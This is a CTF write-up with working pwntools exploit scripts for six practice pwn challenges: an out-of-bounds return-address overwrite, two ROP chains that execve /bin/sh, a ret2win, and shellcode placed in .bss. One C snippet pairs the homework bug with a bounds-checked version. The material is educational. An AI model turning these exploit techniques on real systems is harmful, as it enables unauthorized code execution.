[WriteUp] Hackme CTF -- Pwn solutions

Let's get grinding.

catflag

Description:

nc hackme.inndy.tw 7709

Try using nc to connect to the server!


Solution:

Steps:

VZZ@LAPTOP-1LKROVMM ~
$ nc hackme.inndy.tw 7709
plz capture the flag after 5 seconds...
plz capture the flag after 4 seconds...
plz capture the flag after 3 seconds...
plz capture the flag after 2 seconds...
plz capture the flag after 1 seconds...
ls
flag
run.sh
shell
cat flag
FLAG{cat flag? dog flag!}

Flag:

FLAG{cat flag? dog flag!}

homework

Description:

nc hackme.inndy.tw 7701

Source Code, Index out bound, Return Address


Solution:

This challenge is an out-of-bounds array write, which is not that common.

Exploit:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./homework')
else:
    p = remote('hackme.inndy.tw', 7701)
elf = ELF('./homework', checksec=False)

p.sendlineafter("What's your name? ", '')
p.sendlineafter('numbers\n > ', '1')
# Out-of-bounds index (hint: "Index out bound, Return Address"): slot 14 lies
# past the array, on the saved return address
p.sendlineafter('Index to edit: ', '14')
# The value stored there, sent in decimal as the program expects
p.sendlineafter('How many? ', str(int(0x080485FB)))
p.sendlineafter('numbers\n > ', '0')
p.interactive()
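The bug class behind homework, as an added C illustration (not the challenge's source, which this writeup does not include): a hypothetical stack array whose edit index is never range-checked, beside a checked version that refuses out-of-range indices such as the 14 used above. NUM_COUNT, the function names and the sample input are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed array size; the real challenge's size is not given in the writeup. */
#define NUM_COUNT 5

/* Shape of the bug described for homework: the user-supplied index is used
 * directly, so an index outside [0, NUM_COUNT) stores past the stack array,
 * over saved registers and the return address.  Kept for contrast only. */
void edit_unchecked(int *numbers, long idx, int value)
{
    numbers[idx] = value;
}

/* Hardened edit: range-check before the store.  Returns 0 on success and
 * -1 when the index is rejected; negative indices are refused as well. */
int edit_checked(int *numbers, size_t count, long idx, int value)
{
    if (idx < 0 || (unsigned long)idx >= count)
        return -1;
    numbers[idx] = value;
    return 0;
}

/* Runs a batch of "<index> <value>" lines through the checked editor and
 * returns how many edits were refused (malformed lines count as refused). */
int apply_edits(int *numbers, size_t count, const char *input)
{
    char buf[256];
    int rejected = 0;
    strncpy(buf, input, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    for (char *line = strtok(buf, "\n"); line; line = strtok(NULL, "\n")) {
        long idx, value;
        if (sscanf(line, "%ld %ld", &idx, &value) != 2 ||
            edit_checked(numbers, count, idx, (int)value) != 0)
            rejected++;
    }
    return rejected;
}

int main(void)
{
    int numbers[NUM_COUNT] = {0};
    /* Constructed input: one in-range edit, the writeup's index 14 with
     * 0x080485FB in decimal (134514171), then a negative index. */
    int rejected = apply_edits(numbers, NUM_COUNT, "1 42\n14 134514171\n-1 7\n");
    printf("refused %d of 3 edits; numbers[1] = %d\n", rejected, numbers[1]);
    return 0;
}
```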

Flag:

FLAG{Yoooo, Index Over Flow in my home work......OeAbaFeGeLaF9dEQ}

ROP

Description:

nc hackme.inndy.tw 7704

Tips: Buffer Overflow, ROP
ROP輕鬆談 by L4ys


Solution:

The binary is statically linked and has no restrictions, so the chain produced by ROPgadget's ropchain mode does the job.

Exploit:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
from struct import pack

debug = 1
context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./rop')
else:
    p = remote('hackme.inndy.tw', 7704)
elf = ELF('./rop', checksec=False)

# ROPgadget chain: write "/bin//sh\0" into .data, then execve it via int 0x80
pd = 'a' * 0x10
pd += pack('<I', 0x0806ecda) # pop edx ; ret
pd += pack('<I', 0x080ea060) # @ .data
pd += pack('<I', 0x080b8016) # pop eax ; ret
pd += '/bin'
pd += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
pd += pack('<I', 0x0806ecda) # pop edx ; ret
pd += pack('<I', 0x080ea064) # @ .data + 4
pd += pack('<I', 0x080b8016) # pop eax ; ret
pd += '//sh'
pd += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
pd += pack('<I', 0x0806ecda) # pop edx ; ret
pd += pack('<I', 0x080ea068) # @ .data + 8
pd += pack('<I', 0x080492d3) # xor eax, eax ; ret
pd += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret  (NUL terminator)
pd += pack('<I', 0x080481c9) # pop ebx ; ret
pd += pack('<I', 0x080ea060) # @ .data            (ebx = filename)
pd += pack('<I', 0x080de769) # pop ecx ; ret
pd += pack('<I', 0x080ea068) # @ .data + 8        (ecx = argv, points at NULL)
pd += pack('<I', 0x0806ecda) # pop edx ; ret
pd += pack('<I', 0x080ea068) # @ .data + 8        (edx = envp, points at NULL)
pd += pack('<I', 0x080492d3) # xor eax, eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret  (x11 -> eax = 11 = SYS_execve)
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0807a66f) # inc eax ; ret
pd += pack('<I', 0x0806c943) # int 0x80
p.sendline(pd)
p.interactive()

Flag:

FLAG{ROPgadget is your friend! 0w0...xmnGElie0sAvtcqq}

ROP2

Description:

nc hackme.inndy.tw 7703

ROPgadget not working anymore


Solution:

No usable string for getting a shell was found in the binary, so build a write primitive yourself, write a "/bin/sh\x00" string into a writable area (.bss here), and then execve it.

Exploit:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
# context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./rop2')
else:
    p = remote('hackme.inndy.tw', 7703)
elf = ELF('./rop2', checksec=False)
plt_syscall = elf.plt['syscall']   # syscall(nr, ...) is imported, so its PLT stub is the gadget
addr_bss = elf.bss()
addr_main = 0x08048487

# Stage 1: sys_read(0, addr_bss, 8), then return to main for a second overflow
pd = 'a' * 0x10
pd += p32(plt_syscall)
pd += p32(addr_main)   # where syscall() returns to
pd += p32(0x03)        # SYS_read
pd += p32(0)           # fd 0 (stdin)
pd += p32(addr_bss)    # destination buffer in .bss
pd += p32(8)           # len('/bin/sh\x00')
pd += p32(addr_main)
p.sendline(pd)
sleep(0.1)
p.send('/bin/sh\x00')  # the 8 bytes that read() stores into .bss

# Stage 2: sys_execve(addr_bss, 0, 0)
# gdb.attach(p, "b *0x08048485\nc")
pd = 'a' * 0x10
pd += p32(plt_syscall)
pd += p32(addr_main)
pd += p32(0x0b)        # SYS_execve
pd += p32(addr_bss)    # filename: the "/bin/sh" just written
pd += p32(0)           # argv = NULL
pd += p32(0)           # envp = NULL
p.sendline(pd)
p.interactive()

Flag:

FLAG{Wow, you really know how to ROP!!!...V2rhMIjGNYqQ3Uyx}

toooomuch

Description:

nc hackme.inndy.tw 7702

Can you pass the game?


Solution:

The binary is the same as the second toooomuch challenge; one asks for the real flag and the other for the fake one.

Exploit:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 0
# context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./toooomuch')
else:
    p = remote('hackme.inndy.tw', 7702)
elf = ELF('./toooomuch', checksec=False)
addr_print_flag = elf.sym['print_flag']

# Overflow the 0x1c-byte buffer and return straight into print_flag
pd = 'a' * 0x1c
pd += p32(addr_print_flag)
p.sendline(pd)
p.recvuntil('You are not allowed here!\n')
p.interactive()

Flag:

FLAG{B1N@RY S3@RCH 15 F@5T T0 TH3 GU355 NUM133R G@M3...Vx1uck7CvuaCEew7}

toooomuch-2

Description:

nc hackme.inndy.tw 7702

Get a shell, please.
Tips: Buffer overflow, 0x8048560, shellcode


Solution:

Write shellcode into the .bss segment, then return into .bss, and that's it.

Exploit:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *

debug = 1
# context(log_level="debug", arch="i386", os="linux")
if debug == 1:
    p = process('./toooomuch')
else:
    p = remote('hackme.inndy.tw', 7702)
elf = ELF('./toooomuch', checksec=False)
plt_gets = elf.plt['gets']
addr_bss = elf.bss()
addr_toooomuch = 0x0804877E

pd = 'a' * 0x1c
pd += p32(plt_gets)   # return into gets()
pd += p32(addr_bss)   # gets() returns here: the buffer it just filled
pd += p32(addr_bss)   # gets() argument: read the next line into .bss
p.sendline(pd)
p.recvuntil('You are not allowed here!\n')
p.sendline(asm(shellcraft.sh()))   # the line gets() stores into .bss
p.interactive()

Flag:

FLAG{Buffer overflow is pretty easy, right?...MbIfR7p9sbKbwPSp}